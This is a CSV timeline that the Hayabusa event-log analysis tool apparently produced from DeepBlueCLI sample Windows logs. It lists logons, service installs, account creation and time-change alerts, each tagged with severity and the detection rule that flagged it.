Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath
2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:16:27.000 +09:00,37L4247D28-05,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 01:17:29.468 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: Hyper-V Heartbeat Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Heartbeat | Account: NT AUTHORITY\NetworkService | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:32.328 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: SynthVid | Path: system32\DRIVERS\VMBusVideoM.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:38.218 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: Hyper-V Data Exchange Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature KvpExchange | Account: NT AUTHORITY\LocalService | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:40.125 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: Hyper-V Guest Shutdown Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Shutdown | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:41.421 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: Hyper-V Volume Shadow Copy Requestor | Path: %SystemRoot%\system32\vmicsvc.exe -feature VSS | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:43.125 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: netvsc | Path: system32\DRIVERS\netvsc60.sys | Account:  | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:44.875 +09:00,37L4247D28-05,7045,info,,New Service Installed,Name: Hyper-V Time Synchronization Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature TimeSync | Account: NT AUTHORITY\LocalService | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,,Setting Change in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:11.000 +09:00,37L4247D28-05,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:21:28.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,low,Persis,Local User Account Created,User: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,low,Persis,Local User Account Created,User: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x298c5 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x29908 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:29:39.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:30:56.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:32:13.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:33:15.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d5b | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d8d | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:46:48.772 +09:00,IE8Win7,7045,info,,New Service Installed,Name: Windows Activation Technologies Service | Path: %SystemRoot%\system32\Wat\WatAdminSvc.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:48:35.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:50:26.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f43 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f73 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:55:52.082 +09:00,IE8Win7,7045,info,,New Service Installed,Name: Microsoft .NET Framework NGEN v4.0.30319_X86 | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:03:23.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:04:53.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:05:33.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:06:22.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:18:24.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:19:51.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:21:52.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:23:07.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a20 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a67 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:35:55.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:36:43.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24902 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24936 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:44:06.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:45:59.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19489 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x194bb | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:54:08.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:00.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19153 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
